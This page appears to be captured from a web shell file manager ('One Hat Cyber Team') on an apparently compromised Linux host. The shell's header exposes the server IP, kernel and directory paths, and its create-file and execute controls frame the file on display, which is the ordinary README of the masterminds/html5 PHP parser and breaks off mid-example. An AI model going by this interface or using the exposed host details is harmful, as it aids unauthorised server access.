⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.78
Server IP:
50.6.168.112
Server:
Linux server-617809.webnetzimbabwe.com 5.14.0-570.25.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 9 04:57:09 EDT 2025 x86_64
Server Software:
Apache
PHP Version:
8.4.10
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
ctaacademy
/
www
/
vendor
/
masterminds
/
html5
/
View File Name :
README.md
> # UKRAINE NEEDS YOUR HELP NOW! > > On 24 February 2022, Russian [President Vladimir Putin ordered an invasion of Ukraine by Russian Armed Forces](https://www.bbc.com/news/world-europe-60504334). > > Your support is urgently needed. > > - Donate to the volunteers. Here is the volunteer fund helping the Ukrainian army to provide all the necessary equipment: > https://bank.gov.ua/en/news/all/natsionalniy-bank-vidkriv-spetsrahunok-dlya-zboru-koshtiv-na-potrebi-armiyi or https://savelife.in.ua/en/donate/ > - Triple-check social media sources. Russian disinformation is attempting to coverup and distort the reality in Ukraine. > - Help Ukrainian refugees who are fleeing Russian attacks and shellings: https://www.globalcitizen.org/en/content/ways-to-help-ukraine-conflict/ > - Put pressure on your political representatives to provide help to Ukraine. > - Believe in the Ukrainian people, they will not surrender, they don't have another Ukraine. > > THANK YOU! ---- # HTML5-PHP HTML5 is a standards-compliant HTML5 parser and writer written entirely in PHP. It is stable and used in many production websites, and has well over [five million downloads](https://packagist.org/packages/masterminds/html5). HTML5 provides the following features. - An HTML5 serializer - Support for PHP namespaces - Composer support - Event-based (SAX-like) parser - A DOM tree builder - Interoperability with [QueryPath](https://github.com/technosophos/querypath) - Runs on **PHP** 5.3.0 or newer [](https://github.com/Masterminds/html5-php/actions/workflows/ci.yaml) [](https://packagist.org/packages/masterminds/html5) [](https://scrutinizer-ci.com/g/Masterminds/html5-php/?branch=master) [](https://scrutinizer-ci.com/g/Masterminds/html5-php/?branch=master) [](https://masterminds.github.io/stability/sustained.html) ## Installation Install HTML5-PHP using [composer](http://getcomposer.org/). By adding the `masterminds/html5` dependency to your `composer.json` file: ```json { "require" : { "masterminds/html5": "^2.0" }, } ``` By invoking require command via composer executable: ```bash composer require masterminds/html5 ``` ## Basic Usage HTML5-PHP has a high-level API and a low-level API. Here is how you use the high-level `HTML5` library API: ```php
TEST
Hello World
This is a test of the HTML5 parser.